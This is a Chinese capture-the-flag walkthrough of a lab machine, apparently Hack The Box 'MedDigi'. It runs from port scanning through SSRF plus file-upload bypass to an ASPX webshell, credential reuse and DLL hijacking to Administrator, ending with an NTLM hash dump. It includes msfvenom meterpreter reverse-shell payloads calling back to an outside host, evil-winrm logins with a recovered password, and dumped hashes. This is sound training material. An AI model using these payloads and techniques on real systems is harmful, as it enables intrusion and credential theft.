基本信息
端口扫描 80,443,还有个5985默认扫描会漏掉:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 $ nmap -sC -sV -Pn 10.10.11.238 Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-30 13:34 CST Nmap scan report for meddigi.htb (10.10.11.238) Host is up (0.076s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Did not follow redirect to https://meddigi.htb/ |_http-server-header: Microsoft-IIS/10.0 443/tcp open https? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 76.18 seconds $ nmap -p 5985 10.10.11.238 Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-30 13:36 CST Nmap scan report for meddigi.htb (10.10.11.238) Host is up (0.22s latency). PORT STATE SERVICE 5985/tcp open wsman Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
80/443 需要加hosts:
1 10.10.11.238 meddigi.htb
在线医疗服务:
子域名扫描 子域名可以发现portal:
1 2 3 4 ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "https://meddigi.htb/" -H 'Host: FUZZ.meddigi.htb' [Status: 200, Size: 2976, Words: 1219, Lines: 57, Duration: 2642ms] * FUZZ: portal
portal portal是医生登录界面:
MedDigi 主站测试注册登录,看起来就是病人页面,可以分配医生后在线问诊:
Acctype 检查注册请求发现Acctype参数,默认为1,尝试修改为2注册后登录发现我们是医生,并且选择病人可以看到前面注册的普通病人账号:
但主站这里医生和病人交互部分没什么利用点
portal 我们已经在主站获取到了医生身份,简单的直接在portal复用主站的cookie,可以正常访问portal:
SSRF 各个地方测试功能,Prescription可以输入url,这里可以进行SSRF,基础探测发现8080端口响应内容是这个功能的内部访问入口,并且内部是通过aspx直接使用file参数,以及可以看到外部看不到的pdf路径:
upload report那里可以上传文件,存在校验只能上传pdf,但很容易通过添加pdf文件头绕过:
通过SSRF去查看确认文件后缀都保留原样:
那就可以尝试通过文件上传结合SSRF来webshell
webshell 先通过SSRF得到路径,再通过SSRF去访问aspx触发shell,得到的是svc_exampanel用户:
1 2 3 4 5 6 7 msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.16.6 LPORT=443 -f aspx -o shell.aspx http://127.0.0.1:8080/ViewReport.aspx?file=30ef5746-5da5-414a-b55c-35d0a9fd9f58_shell.aspx meterpreter > execute -H -f notepad Process 1060 created. meterpreter > migrate 1060
user flag svc_exampanel桌面得到user flag:
ExaminationPanel Iis相关目录,根据用户名找到ExaminationPanel,文件下载到本地分析:
1 2 meterpreter > cd c:\\inetpub\\ExaminationPanel\\ExaminationPanel\\bin meterpreter > download ExaminationManagement.dll
ExaminationManagement.dll 根据代码,会从注册表中读取一个key:
RegistryKey 根据代码中得到的注册表路径去查询,得到该key:
1 2 3 reg query HKLM\Software\MedDigi 1g0tTh3R3m3dy!!
devops 使用得到的key当作密码,发现devopc用户使用这个密码:
1 2 3 4 5 6 7 Administrator devdoc svc_exampanel svc_meddigi svc_meddigiportal evil-winrm -i 10.10.11.238 -u devdoc -p '1g0tTh3R3m3dy!!'
ReportManagement 查看运行中进程可以发现ReportManagement,找到对应文件下载到本地分析:
1 *Evil-WinRM* PS C:\Program Files\ReportManagement> download ReportManagement.exe
upload 反编译可以看到一些100端口那里可用的命令,其中upload会尝试在C:\Program Files\ReportManagement\Libraries查找externalupload.dll(转发端口动态跟更容易发现这部分):
而这个dll文件并不存在,并且我们当前devdoc用户有写权限:
那就很明确了,dll劫持,写入一个恶意dll然后通过upload去触发执行
dll劫持 生成个恶意dll,上传,触发执行,得到Administrator:
1 2 3 4 5 6 7 8 9 10 11 # 转发端口,方便访问触发 meterpreter > portfwd add -l 9999 -p 100 -r 127.0.0.1 msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.16.6 LPORT=443 -f dll -o externalupload.dll *Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> upload externalupload.dll # 操作要快,dll会被自动清理 nc 127.0.0.1 9999 # 随意输入,upload触发就行 upload xxx
root flag Administrator桌面:
hashdump 1 2 3 4 5 6 7 8 9 meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:3d636ff292d255b1a899123876635a22::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: devdoc:1002:aad3b435b51404eeaad3b435b51404ee:ba864f62df01b1115c4ce69988e31c83::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: svc_exampanel:1007:aad3b435b51404eeaad3b435b51404ee:bca84f651e110749aecef8259f16ce2f::: svc_meddigi:1006:aad3b435b51404eeaad3b435b51404ee:bca84f651e110749aecef8259f16ce2f::: svc_meddigiportal:1008:aad3b435b51404eeaad3b435b51404ee:bca84f651e110749aecef8259f16ce2f::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:78601e0139a6d95351626a66a22c4b65:::
参考资料
最終更新:2024-03-11 09:51:18
水平不济整日被虐这也不会那也得学,脑子太蠢天天垫底这看不懂那学不会